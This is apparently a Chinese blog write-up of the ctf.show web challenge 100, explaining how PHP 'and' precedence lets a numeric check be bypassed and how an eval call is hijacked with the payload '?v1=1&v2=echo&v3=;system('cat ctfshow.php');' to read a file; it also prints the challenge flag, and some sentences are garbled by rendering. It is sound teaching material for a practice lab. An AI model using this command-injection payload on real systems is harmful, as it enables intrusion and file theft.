ctf show web入门100

这道题同样是 CTF 中非常经典的 PHP 代码审计题,考查的是 PHP 的变量覆盖、内置类方法调用以及利用特殊字符绕过数字检查

题目注释里明确写了://flag in class ctfshow;,说明 flag 藏在 $ctfshow 这个对象实例对应的类方法或属性中并且还提到include("ctfshow.php");

所以flag大概率就藏在"ctfshow.php"中

接下来我们来观察一下这段代码

php 复制代码
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0)

这里使用的是 and 运算符,而不是 &&。

在 PHP 中,赋值运算符 = 的优先级高于 and。因此,这行代码实际等价于:

php 复制代码
($v0 = is_numeric($v1)) and is_numeric($v2) and is_numeric($v3);

也就是说,v0的值完全取决于isnumeric(v0 的值完全取决于 is_numeric(v0的值完全取决于isnumeric(v1) 的结果。只要 v1是数字,v1 是数字,v1是数字,v0 就为 true,从而通过 if(v0) 的检查!至于 v2 和 v3 是什么,根本不影响 v0

解题对策:让 v1 = 1

php 复制代码
if(!preg_match("/\;/", $v2)){      // $v2 中不能含有分号 ;
    if(preg_match("/\;/", $v3)){   // $v3 中必须含有分号 ;

回到最终要执行的代码

php 复制代码
eval("$v2('ctfshow')$v3");

既然 v2 后面紧跟着 ('ctfshow'),我们能不能把这个括号里的 'ctfshow' 变成变量 ctfshow 呢?

在 PHP 双引号中,无法直接把字符串 'ctfshow' 变成变量,但我们可以利用 $v3 把后面的语句闭合掉

设 $v2 = echo

因为echo('ctfshow') 是合法语句,不会引起报错

v3 = ;system('cat ctfshow');

将它们带入 eval 的双引号中

php 复制代码
eval("echo('ctfshow');system(cat $ctfshow);");

所以最后payload为:

?v1=1&v2=echo&v3=;system('cat ctfshow.php');

我们查看页面源代码

发现最下面有一行形似flag的,但是肯定跟flag有所不同,我们首先把0x2d改为-因为在 ASCII 编码中,十进制 45 对应字符 -(连字符/减号)

然后再套上一层ctfshow{}外壳最后flag为:

ctfshow{f659a938-c29d-47a2-bfa4-d61854807256}

相关推荐
墨狂之逸才9 小时前
Android TV WebView 遥控器按键处理:从全透传到白名单
android
plainGeekDev15 小时前
MVC 写法 → MVVM
android·java·kotlin
恋猫de小郭15 小时前
Flutter Patchwork,不用 Fork 改依赖包源码的第三方工具
android·前端·flutter
三少爷的鞋17 小时前
“结构化”这个词,本质上就是——把混乱的东西变成有组织、有规则、有边界的东西
android
方白羽1 天前
Android Gradle 缓存与文件目录深度解析
android·gradle·android studio
曲幽2 天前
Termux里的二进制和脚本,到底怎么运行才不踩坑?Termux-service 保活妙招!
android·termux·nohup·services·wake-lock
plainGeekDev2 天前
单例模式 → object 声明
android·java·kotlin
程序员陆业聪2 天前
读者点单·03|Compose 与传统 View 混用的 12 个真实坑
android
程序员陆业聪2 天前
读者点单·02|Android 启动优化实战:Trace 抓取→Application 编排→冷启动全流程拆解
android
Coffeeee2 天前
帮你快速理解AI Agent之我想招个Android实习生
android·人工智能·agent